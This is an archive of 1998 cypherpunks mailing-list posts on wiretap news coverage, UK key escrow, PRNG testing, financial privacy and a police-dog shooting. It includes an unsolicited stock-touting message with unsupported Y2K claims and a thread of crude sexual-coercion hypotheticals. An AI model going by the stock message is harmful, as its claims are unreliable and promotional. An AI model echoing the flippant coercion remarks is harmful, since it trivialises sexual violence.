O+m5Ag0ENRPUaxAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU
6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN
/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9
WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0
/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQ
mwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIANDxYVQYe4ZXIS8pYMT5
RyCM1IH8Zl2D29Dem3DpaR8nIaaV7S3MqtQ78m0dH2ae5GeyVEmNl1Hbr0N2SHzi
tmAMHqU2wriYsWuczFO+55Qman924+0LHJTykpj6LIzs7C426hkj23nuDc4m4y4n
p8wCLg8f4ySWwDHdFNgydRwcgC6M8Z5HqFeCsUFX5KPbZjxmMyD+jzoeKSKtju4D
MqTMvbotVDycnjB4P2aXEas1iie4irlgB/bNsQCFQY3KdTJsCkb70KwaK+eAzo5Y
iXXREZqK9XsIR65AG5B6jenwziwrTEirCtqDs4gqBt54X/IeKIjJDIYwTmUyxIcW
GK2JAEYEGBECAAYFAjUT1GsACgkQg0Rfznk272D76gCg/LOtMsq7I0NnuEp3qr/I
qKmOJngAoNPsyKKflQrPkA6LAJfFXVRmRSdx
=KgPx
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 23 Oct 1998 03:13:29 +0800
To: <cypherpunks@Algebra.COM>
Subject: NOW!  Talk of the Nation is discussing lack of reporting of certain news topics
Message-ID: <00d001bdfdeb$1979da80$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Please try to call in between 12:00 and 1:00pm Pacific
time to Talk of the Nation (1-800-989-TALK [8255]) to
ask to talk about the lack of reporting on the EU's
scuttled discussion of Echelon and NSA/FBI world wide
spying!

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 23 Oct 1998 03:49:45 +0800
To: k-elliott@wiu.edu
Subject: RE: RE: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("Kill Switch")
Message-ID: <362F83C1.5929@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Kevin,

Like it or not our society needs a police force. They have a dangerous
and difficult job and I would never contend that the they should risk
their lives unnecessarily. Furthermore, the 'suspect's' behavior is not
defensible. But anyone who classifies a DOG as a HUMAN is DANGEROUS to
other humans.

> Definitely manslaughter, probably 2nd or even 1st degree murder.  In

That's FUCKING NUTS. Take the word manslaughter apart.

int Screwball_Disney_Justice( int victim ){
    int penalty;

    switch ( victim ){ 
        case DOG :
        case MAN :
    	    penalty = ( MAX_PENALTY | BANKRUPTCY );
	    break;

        default : // covers consentual violations
            penalty = BANKRUPTCY;
            break;
    }
    return penalty;
}

> (I believe) every state the union the penalty for shooting a police
> dog is the same as shooting an on duty police officer.  Police dogs
> are effectively classified as deputies.

There are so many damn laws that anyone can be destroyed whenever the
powers that be decide they're inconvenient. So you think a human should
go to the gas chamber for killing a dog? Has the constitutionality of
this been tested in any recent cases? What about the punishment fitting
the crime? A few thousand bucks for a dog vs. a human life?

I like animals and I think they should be treated with some respect but
they are not people. My opinion of the incident was formed by the
treating of a dog as human and the human as animal. 

BTW - what is your opinion of recent proposed laws banning the use of
horses and dogs as food? 

A) Common sense.
B) How could you eat such nice, smart animals?
C) Tyranny of the Disneyfied majority.
D) Total Bullshit.
E) Both C and D.

IMHO - E.

What about cockfights? It usually lasts about 5-15 seconds and the loser
becomes lunch. There is no *significant* difference between buying the
chicken at the grocery and a cockfight. If you say that the difference
is one of enjoying the violence - grow up. Just because the violence on
the grocery store shelf is individually wrapped for your convenience
doesn't alter its nature.

Maybe we need a new law - a license to eat meat. Anyone who doesn't go
through a course on killing their own meat should not be issued a
carnivore permit with different stamps for different animal foods.

Before you write the rant off as rambling crap the theme is - moronic
personification and lack of perspective.

Fuck Walt Disney - 

Because he's been fucking with our heads for decades. Every girl a
princess, every boy a prince, every creature a human soul trapped in an
animal's body.

Mike

rant, rant, rant...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 23 Oct 1998 04:34:57 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Women cannot commit rape?
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A92@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> "You get hard right now or I take this knife and cut your 
> balls off sloooowly! You have one minute."
> 
> That is probably out in left field. I doubt it would 
> happen much.

No, and I doubt it would work either.

However any man who thinks they cannot be coerced into arousal by other
(physical) means is terribly sexually naive.

This is the problem with puritan judges. Some madam needs to tie him up
and show him exactly how easy he could be raped -- that is if he's not
impotent too.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 23 Oct 1998 04:44:00 +0800
To: <totn@npr.org>
Subject: Censored news topic censored ...
Message-ID: <014201bdfdf8$617de800$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Dear TOTN at NPR,

This is most distressing.  I was one of the very first
callers to your Talk of the Nation show today whose
topic was relevant news reporting in the US.  My topic
was the lack of reporting on the FBI's last minute
sneak of the roving wire tap proposal into the
intelligence budget bill.  I wanted Ray to talk about
the editorial process and how these things get dropped
on the floor as this item is extremely important to
our democracy because it is an agency charged with
protecting our Constitutional rights (the FBI) who is
deliberately circumventing the democratic legislative
process to pass a law which was sounded defeated two
years ago in open debate.

Ironically, my topic was censored, and I waited an
hour, while other people wanted to discuss things
like how they can vent about their divorce
difficulties through the Monica Lewinsky scandal, only
to be dropped in the end.

Would any of the NPR staff or Mr. Suarez would like
to explain just what happened here?

Ern

--------
Ernest Hua, TeraLogic Inc, 1300 Villa St, Mountain View, CA 94041
(650) 526-6064, hua@teralogic-inc.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nations@freeyellow.com
Date: Fri, 23 Oct 1998 06:00:38 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199810222119.OAA23568@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



                                                         10/22/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for...








 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>bman@barn.pct
Date: Thu, 22 Oct 1998 23:17:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: The Economic Cause of Privacy
Message-ID: <199810221225.OAA21798@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Remember, the reason we have no financial privacy these days is because we
>have book-entry settlement, which relies on biometric identity, known physical
>location, and the force of a nation state as the ultimate "error-handler" to
>prevent repudiation in the transaction protocol.

Yes, and cars break down because there are service shops.

Utter nonsense.

There is no financial privacy because because those who would like such thing
have less power (hired guns) than those who would not like it. And those with
controlling interests in modern societies do not like it because control would
be lost, and population harvesting (aka taxing) would have to be radically
changed, and that is expensive. The system is self-supporting.

Idea that somehow smart algorithms will bring financial privacy is a good starting
point for cryptoaddict's wet dream, but in reality has the same chance of
success as survival rate of armed citizens against the government. Zero.

(However, brandishing weapons and algorithms may alleviate some acute distress
caused by excess testosterone levels :)

Use of government-controlled, issued and supervised payment methods/instruments
is in place because it is proscribed, not because "money/checks, etc. exist".
Money is a highly artificial entity in the first place. It is "natural" to
use currency-binded valuation as it is natural to go to church. And theorizing
on money and economy in general has similarities to religious rituals.

Therefore constructing computer-assisted anon payment schemes "because it is
cheaper that way" is pointless. Money is not there to make your life easier.
Money exists so that you can be taxed and conditioned to desired behaviour at
minimal cost.

Anonymous payments defy the principal reason money exists for, and is sanctioned
(and enforced) by the state.

The only way for society (or loosely coupled individuals) to function without
abstractions like money (that need organized gun power to maintain) is direct
exchange of goods and services with enforcement based on close relationships
between parties. Has been tried, several thousand years ago, and such societies
were annihilated by others who did organize. Which seems to be the fate of any
anarchism in general.


Barnmen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Thu, 22 Oct 1998 22:57:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Women cannot commit rape?
Message-ID: <19981022143445.16361.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



>This is true in the United States as well.  That's why in every state,
>technically speaking, their is no crime of "rape" just varying degrees and
>types of "criminal sexual assault".  I'm suprised that hasn't trickled down
>to france yet.  Rape is defined as forcing someone to have sexual
>intercourse.  It doesn't take much imagination to build an argument that
>you can't force a man to have sex, after all he had to get aroused.  The
>advantage of criminal sexual assualt is that it side steps these kind of
>issues by greatly broadening the crime to basicly forcing/manipulating
>someone  to engae in any kind of sexual activity.

"You get hard right now or I take this knife and cut your balls off
sloooowly! You have one minute."

That is probably out in left field. I doubt it would happen much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infopeace.com>
Date: Fri, 23 Oct 1998 06:27:48 +0800
To: "Ernest Hua" <totn@npr.org>
Subject: Re: Censored news topic censored ...
In-Reply-To: <014201bdfdf8$617de800$4164a8c0@mve21>
Message-ID: <v03130306b254f91663e1@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain



It sounds like even the enlightened folks at NPR don't have the guts
to stand up and say something about issues as critical as expanded
FBI powers over citizens and the sneaky tricks used to pass those laws.

It's not really a big surprise, though.  Monica Lewinsky's blowjobs
take precedence over incredulous claims like 'NSA SPIES ON EVERYONE'
and 'FBI MONITORS YOU WITHOUT WARRANTS'.

They will have to live with their own lack of character. So will we.

Mark Hedges


At 1:13 PM -0700 10/22/98, Ernest Hua wrote:
>Dear TOTN at NPR,
>
>This is most distressing.  I was one of the very first
>callers to your Talk of the Nation show today whose
>topic was relevant news reporting in the US.  My topic
>was the lack of reporting on the FBI's last minute
>sneak of the roving wire tap proposal into the
>intelligence budget bill.  I wanted Ray to talk about
>the editorial process and how these things get dropped
>on the floor as this item is extremely important to
>our democracy because it is an agency charged with
>protecting our Constitutional rights (the FBI) who is
>deliberately circumventing the democratic legislative
>process to pass a law which was sounded defeated two
>years ago in open debate.
>
>Ironically, my topic was censored, and I waited an
>hour, while other people wanted to discuss things
>like how they can vent about their divorce
>difficulties through the Monica Lewinsky scandal, only
>to be dropped in the end.
>
>Would any of the NPR staff or Mr. Suarez would like
>to explain just what happened here?
>
>Ern
>
>--------
>Ernest Hua, TeraLogic Inc, 1300 Villa St, Mountain View, CA 94041
>(650) 526-6064, hua@teralogic-inc.com



________________________________________________________________
  Mark Hedges      hedges@infopeace.com      www.infopeace.com

  "One does not establish a dictatorship in order to safeguard
  a revolution; one makes the revolution in order to establish
  a dictatorship."  O'Brien from 1984, George Orwell
________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Fri, 23 Oct 1998 06:42:10 +0800
To: Mok-Kong Shen <rsriram@krdl.org.sg>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <3.0.5.32.19981022150348.0091c990@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:30 AM 10/21/98 +0100, Mok-Kong Shen wrote:
>
>Not answerable.  (Reason: substitute car, HIFI, medical doctor, etc. 
>for 'software PRNG').

Nice metaphors.

>> 2. Are there any software implementations to test the randomness of a
>>    PRNG ? I've looked at Diehard - is there anything else?
>
>There are tests that one can implement with reasonable effort.
>A test relevant in cryptology is Maurer's test.

Recall that Ueli's Universal Statistical Test
is valid only for real sources of entropy.
PRNGs have zero entropy asymptotically ;-)










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Fri, 23 Oct 1998 07:03:56 +0800
To: "Ernest Hua" <totn@npr.org>
Subject: Re: Censored news topic censored ...
In-Reply-To: <014201bdfdf8$617de800$4164a8c0@mve21>
Message-ID: <v03130308b255013a4d8c@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain



Interesting. Back to you, Ernest.
--mark--

>From: TOTNMAIL@npr.org
>Date: Thu, 22 Oct 1998 18:24:54 -0400
>To: HEDGES@INFOPEACE.COM
>Subject: your note
>
>Your "evidence" of NPR collusion and stifling of the news would be most
>disturbing, except for the fact that I have discussed roving wiretaps on the
>air, explained the manner in which they were being rammed through with little
>debate, and talked about how it was a departure from years of precedence
>regarding warrants and court permission. I have the on-air transcript, you
>have
>the hearsay of a caller who is disappointed because he didn't get on the air.
>
>Ray Suarez


At 1:13 PM -0700 10/22/98, Ernest Hua wrote:
>Dear TOTN at NPR,
>
>This is most distressing.  I was one of the very first
>callers to your Talk of the Nation show today whose
>topic was relevant news reporting in the US.  My topic
>was the lack of reporting on the FBI's last minute
>sneak of the roving wire tap proposal into the
>intelligence budget bill.  I wanted Ray to talk about
>the editorial process and how these things get dropped
>on the floor as this item is extremely important to
>our democracy because it is an agency charged with
>protecting our Constitutional rights (the FBI) who is
>deliberately circumventing the democratic legislative
>process to pass a law which was sounded defeated two
>years ago in open debate.
>
>Ironically, my topic was censored, and I waited an
>hour, while other people wanted to discuss things
>like how they can vent about their divorce
>difficulties through the Monica Lewinsky scandal, only
>to be dropped in the end.
>
>Would any of the NPR staff or Mr. Suarez would like
>to explain just what happened here?
>
>Ern
>
>--------
>Ernest Hua, TeraLogic Inc, 1300 Villa St, Mountain View, CA 94041
>(650) 526-6064, hua@teralogic-inc.com



--  --  --  --  --  --  --  --  --  --  --  --  --  --  --  --
         Infonex Internet,  Inc.   Mark Hedges,  VP
         8415 La Mesa Bl. Ste. 3   Phn 619-667-7969
         La Mesa, CA  91941  USA   Fax 619-667-7966

      "...the scholar has lived in many times and is
       therefore in some degree immune from the great
       cataract of nonsense that pours from the press
       and the microphone of his own age." C.S. Lewis
--  --  --  --  --  --  --  --  --  --  --  --  --  --  --  --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 23 Oct 1998 05:39:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Toto update...
Message-ID: <199810222120.QAA08662@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I thought I'd post an update on my situation.

I've been released from the Grand Jury in Nov. at this time. My affadavit
was found to be sufficient. If further action on my part is needed I'll be
contacted.

As to posting the affadavit and such. I've been asked, and will comply, not
to release the photo of Toto. I do intend to post the subepoena and the
affadavit but only after Nov. and most likely not until after the new year
and I'm sure the issues are reasonably resolved.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 23 Oct 1998 08:09:50 +0800
To: <TOTNMAIL@npr.org>
Subject: Re: Censored news topic censored ...
Message-ID: <002b01bdfe13$7d644940$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Suarez,

Ah ... I see where the misunderstandings are ...

I am listening to the program on "The Budget Deal",
which is the hour most likely to have any mention
of the roving wiretap provision.

On-the-air transcripts or not, however, I think you
still miss the central point.  The issue is that
most major news outlets did NOT report on HOW this
provision was rammed through Congress.  I did not
specifically accuse YOU of not reporting, which is
probably why you are so defensive.  Certainly, the
Market Place show reported this, and so did the San
Jose Mercury, but not New York Times.  ABCNEWS only
said that something was passed to help law
enforcement, as if anything passed to help law
enforcement is necessarily a good thing.

The issue is not whether the issue of roving wire
taps got any light of day.  The issue is that the
process of the roving wire taps being rammed
through Congress did NOT get the light of day,
specifically because the FBI lobbyists did this at
the last minute to get it hidden in all the noise
of the frantic 11th hour budget deals ... which is
why I thought the topic was most appropriate to the
discussion of relevant news today.

I did not claim to have a solution to the problem
of too much noise to valuable news ratio.  However,
some insight from someone like you, Ray, could have
been a good discussion and education for all of us
concerned with the FBI's legislative tricks.

I would have also brought up the lack of reporting
on the EU's concerns about US/UK mass wire tapping.
It's clear that the NSA does not want this topic
discussed, and in fact, had pressured the EU to not
bring up the topic.  Wired magazine reported this
within the last week, but S J Mercury had nothing
on it, nor the N Y Times, etc ...

Ray, please do not think I am accusing YOU of
censoring the wire tap topic.  What I am concerned
about is the news media's role in not shining a
bright lights on these topics, and that is a very
serious issue.

Ern

-----Original Message-----
From: Mark Hedges <hedges@infonex.com>
Date: Thursday, October 22, 1998 3:29 PM
Subject: Re: Censored news topic censored ...


>Interesting. Back to you, Ernest.
>>From: TOTNMAIL@npr.org
>>Date: Thu, 22 Oct 1998 18:24:54 -0400
>>To: HEDGES@INFOPEACE.COM
>>Your "evidence" of NPR collusion and stifling of the news would be most
>>disturbing, except for the fact that I have discussed roving wiretaps on
the
>>air, explained the manner in which they were being rammed through with
little
>>debate, and talked about how it was a departure from years of precedence
>>regarding warrants and court permission. I have the on-air transcript, you
>>have
>>the hearsay of a caller who is disappointed because he didn't get on the
air.
>>
>>Ray Suarez
>
>>This is most distressing.  I was one of the very first
>>callers to your Talk of the Nation show today whose
>>topic was relevant news reporting in the US.  My topic
>>was the lack of reporting on the FBI's last minute
>>sneak of the roving wire tap proposal into the
>>intelligence budget bill.  I wanted Ray to talk about
>>the editorial process and how these things get dropped
>>on the floor as this item is extremely important to
>>our democracy because it is an agency charged with
>>protecting our Constitutional rights (the FBI) who is
>>deliberately circumventing the democratic legislative
>>process to pass a law which was sounded defeated two
>>years ago in open debate.
>>
>>Ironically, my topic was censored, and I waited an
>>hour, while other people wanted to discuss things
>>like how they can vent about their divorce
>>difficulties through the Monica Lewinsky scandal, only
>>to be dropped in the end.
>>
>>Would any of the NPR staff or Mr. Suarez would like
>>to explain just what happened here?
>>
>>Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Fri, 23 Oct 1998 00:16:27 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: "We have to destroy privacy in order to protect privacy"
Message-ID: <WIN937-981022152104-7CD3*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain




Slogan in the Subject used by Tim May.

http://www.metromail.com/ sold for 845 Mio $.
business: collecting and selling personal data from open sources.

T. Schlickmann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Fri, 23 Oct 1998 00:09:25 +0800
To: <cypherpunks@Algebra.COM>
Subject: We spy for you
Message-ID: <WIN937-981022152340-4819*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain




http://www.spiegel.de/netzwelt/middle.phtml?channel=netzwelt&rub=02&cont=themen/datenschutz_schoen.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 23 Oct 1998 10:30:24 +0800
To: cypherpunks@toad.com
Subject: UK Government unveils crypto escrow legislation
Message-ID: <199810230147.SAA25775@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Thu, 22 Oct 1998 15:38:10 +0100
From: Malcolm Hutty <cacib@liberty.org.uk>
To: declan@well.com
Subject: UK Government unveils crypto escrow legislation

The UK government has announced legislation designed to force 
escrow of confidentiality keys on UK netizens.

They are planning a licenced system of Certificate Authorities in an 
attempt to force key escrow down the throats of British computer 
users. This could be a model for other governments. The idea is 
that digital signatures get preferential legal treatment if certified by 
a licenced CA, but to get a licence you must escrow confidentiality 
keys.  

The licensing authority will be OFTEL, the telecoms regulator.

You may want to check out this link for full details
http://omnisite.liberty.org.uk/cacib/

-----------------------------------------------------------------------
Campaign Against Censorship                          Tel: 0171 589 4500
of the Internet in Britain        Say NO             Fax: 0171 589 4522
60 Albert Court                 to censorship!       
Prince Consort Road                                cacib@liberty.org.uk
London SW7 2BE                         http://www.liberty.org.uk/cacib/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Fri, 23 Oct 1998 03:18:11 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Women cannot commit rape?
In-Reply-To: <19981022143445.16361.qmail@hades.rpini.com>
Message-ID: <36307e3d.48462966@news>
MIME-Version: 1.0
Content-Type: text/plain



On 22 Oct 1998 13:13:39 -0500, Anonymous <nobody@remailer.ch> wrote:

>>This is true in the United States as well.  That's why in every state,
>>technically speaking, their is no crime of "rape" just varying degrees and
>>types of "criminal sexual assault".  I'm suprised that hasn't trickled down
>>to france yet.  Rape is defined as forcing someone to have sexual
>>intercourse.  It doesn't take much imagination to build an argument that
>>you can't force a man to have sex, after all he had to get aroused.  The
>>advantage of criminal sexual assualt is that it side steps these kind of
>>issues by greatly broadening the crime to basicly forcing/manipulating
>>someone  to engae in any kind of sexual activity.
>
>"You get hard right now or I take this knife and cut your balls off
>sloooowly! You have one minute."
>
>That is probably out in left field. I doubt it would happen much.

How about force feeding him a bottle of viagra.  That might do it.

-- Phelix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 23 Oct 1998 11:01:38 +0800
To: <HEDGES@infopeace.com>
Subject: Re: Censored news topic censored ...
Message-ID: <009301bdfe2d$970c6fc0$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Ray & Mark,

Well, I found the show, so Mr. Suarez get the
bonus credit for having actually talked about
this topic on air.  Ray did talk about the
item because a caller brought it up.  He did
allude to the fact that these items might not
be given much attention.

However, my point was that
this was passed deliberately passed at a point
when the FBI knew too much other noise would
drown this item out of most mainstream media
outlets.  This subtle calculation of the media
response is the topic I am concerned about.

Any PARTICULAR media outlet, such as TOTN, may
not necessarily be guilty of censorship in the
deliberate sense, but lots of stories drop on
the proverbial cutting room floor, and the Wag
The Dog effect where the embarassing stuff was
manipulated into page 23 of NY Times while
bogus news items were fed for front page is
the effect I wanted to discuss with Ray.

Again, Ray, I am not saying YOU deliberately
censored anything, nor am I saying ANY news
outlet deliberately censored this story.  I am
accusing the FBI of counting on a particular
behavior on the part of Congress, news outlets,
and the American people at a time when lots of
budget items are flying by to slip their agenda
in, and this is particularly bad behavior for a
agency charged with protecting the constitutional
rights of law abiding citizens.

Ern

-----Original Message-----
From: Ernest Hua <hua@teralogic-inc.com>
To: TOTNMAIL@npr.org <TOTNMAIL@npr.org>
Cc: cypherpunks@cyberpass.net <cypherpunks@cyberpass.net>;
letters@nytimes.com <letters@nytimes.com>; HEDGES@infopeace.com
<HEDGES@infopeace.com>
Date: Thursday, October 22, 1998 4:51 PM
Subject: Re: Censored news topic censored ...


>Mr. Suarez,
>
>Ah ... I see where the misunderstandings are ...
>
>I am listening to the program on "The Budget Deal",
>which is the hour most likely to have any mention
>of the roving wiretap provision.
>
>On-the-air transcripts or not, however, I think you
>still miss the central point.  The issue is that
>most major news outlets did NOT report on HOW this
>provision was rammed through Congress.  I did not
>specifically accuse YOU of not reporting, which is
>probably why you are so defensive.  Certainly, the
>Market Place show reported this, and so did the San
>Jose Mercury, but not New York Times.  ABCNEWS only
>said that something was passed to help law
>enforcement, as if anything passed to help law
>enforcement is necessarily a good thing.
>
>The issue is not whether the issue of roving wire
>taps got any light of day.  The issue is that the
>process of the roving wire taps being rammed
>through Congress did NOT get the light of day,
>specifically because the FBI lobbyists did this at
>the last minute to get it hidden in all the noise
>of the frantic 11th hour budget deals ... which is
>why I thought the topic was most appropriate to the
>discussion of relevant news today.
>
>I did not claim to have a solution to the problem
>of too much noise to valuable news ratio.  However,
>some insight from someone like you, Ray, could have
>been a good discussion and education for all of us
>concerned with the FBI's legislative tricks.
>
>I would have also brought up the lack of reporting
>on the EU's concerns about US/UK mass wire tapping.
>It's clear that the NSA does not want this topic
>discussed, and in fact, had pressured the EU to not
>bring up the topic.  Wired magazine reported this
>within the last week, but S J Mercury had nothing
>on it, nor the N Y Times, etc ...
>
>Ray, please do not think I am accusing YOU of
>censoring the wire tap topic.  What I am concerned
>about is the news media's role in not shining a
>bright lights on these topics, and that is a very
>serious issue.
>
>Ern
>
>-----Original Message-----
>From: Mark Hedges <hedges@infonex.com>
>Date: Thursday, October 22, 1998 3:29 PM
>Subject: Re: Censored news topic censored ...
>
>
>>Interesting. Back to you, Ernest.
>>>From: TOTNMAIL@npr.org
>>>Date: Thu, 22 Oct 1998 18:24:54 -0400
>>>To: HEDGES@INFOPEACE.COM
>>>Your "evidence" of NPR collusion and stifling of the news would be most
>>>disturbing, except for the fact that I have discussed roving wiretaps on
>the
>>>air, explained the manner in which they were being rammed through with
>little
>>>debate, and talked about how it was a departure from years of precedence
>>>regarding warrants and court permission. I have the on-air transcript,
you
>>>have
>>>the hearsay of a caller who is disappointed because he didn't get on the
>air.
>>>
>>>Ray Suarez
>>
>>>This is most distressing.  I was one of the very first
>>>callers to your Talk of the Nation show today whose
>>>topic was relevant news reporting in the US.  My topic
>>>was the lack of reporting on the FBI's last minute
>>>sneak of the roving wire tap proposal into the
>>>intelligence budget bill.  I wanted Ray to talk about
>>>the editorial process and how these things get dropped
>>>on the floor as this item is extremely important to
>>>our democracy because it is an agency charged with
>>>protecting our Constitutional rights (the FBI) who is
>>>deliberately circumventing the democratic legislative
>>>process to pass a law which was sounded defeated two
>>>years ago in open debate.
>>>
>>>Ironically, my topic was censored, and I waited an
>>>hour, while other people wanted to discuss things
>>>like how they can vent about their divorce
>>>difficulties through the Monica Lewinsky scandal, only
>>>to be dropped in the end.
>>>
>>>Would any of the NPR staff or Mr. Suarez would like
>>>to explain just what happened here?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Fri, 23 Oct 1998 09:09:41 +0800
To: cypherpunks@Algebra.COM
Subject: RE: RE: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("KillSwitch")
In-Reply-To: <362F83C1.5929@lsil.com>
Message-ID: <v04020a00b2557a5da4f6@[143.43.192.181]>
MIME-Version: 1.0
Content-Type: text/plain



>Like it or not our society needs a police force. They have a dangerous
>and difficult job and I would never contend that the they should risk
>their lives unnecessarily. Furthermore, the 'suspect's' behavior is not
>defensible. But anyone who classifies a DOG as a HUMAN is DANGEROUS to
>other humans.

agree in principle.

>> Definitely manslaughter, probably 2nd or even 1st degree murder.  In

To clarify I presented this as the current likely punishment.

>That's FUCKING NUTS. Take the word manslaughter apart.

Manslaughter is a legal crime, it does not NECESSARILY mean that one has to
kill a man to be guilty.  This is exactly the same reason that women
cannot, by the meaning of the word, be guilty of rape.  To rape is to
sexually penetrate by use of force.  Women don't have the plumbing.  (see
seperate thread)

>There are so many damn laws that anyone can be destroyed whenever the
>powers that be decide they're inconvenient. So you think a human should
>go to the gas chamber for killing a dog? Has the constitutionality of
>this been tested in any recent cases? What about the punishment fitting
>the crime? A few thousand bucks for a dog vs. a human life?

So what would you recommend?  Their has to be a substansial punishment for
shooting the dog, otherwise their no reason suspects should not habitually
shoot police dogs if it would increase their chance of escape.  For
comparison purposes does anyone know what the punishment would be for
blowing up a police car?

>I like animals and I think they should be treated with some respect but
>they are not people. My opinion of the incident was formed by the
>treating of a dog as human and the human as animal.

How was the human treated as an animal?  I think a strong argument can be
made that the dog is serving in the same role (or similar) that a human
would otherwise be in and that is the reason for the harsh punishment.  Not
because you shot a dog but because you shot a "police officer".

>BTW - what is your opinion of recent proposed laws banning the use of
>horses and dogs as food?

Anyone know a place you can get good dog in the US?  <G>

>A) Common sense.
>B) How could you eat such nice, smart animals?
>C) Tyranny of the Disneyfied majority.
>D) Total Bullshit.
>E) Both C and D.

In general E.  See comments below.

>What about cockfights? It usually lasts about 5-15 seconds and the loser
>becomes lunch. There is no *significant* difference between buying the
>chicken at the grocery and a cockfight. If you say that the difference
>is one of enjoying the violence - grow up. Just because the violence on
>the grocery store shelf is individually wrapped for your convenience
>doesn't alter its nature.

I think part of this comes back to a sticky issue in the libertarian view-
at what level are people allowed to tell other people they cannot do
certain things in certain places. The federal government should not be
making laws about peoples eating habits.  Neither should the state.
However-  the small community feels that dog eating, cock fighting, etc.
are not things they want to live around.  Do they have the right to say we
don't want those things going on around us?  I think the way the
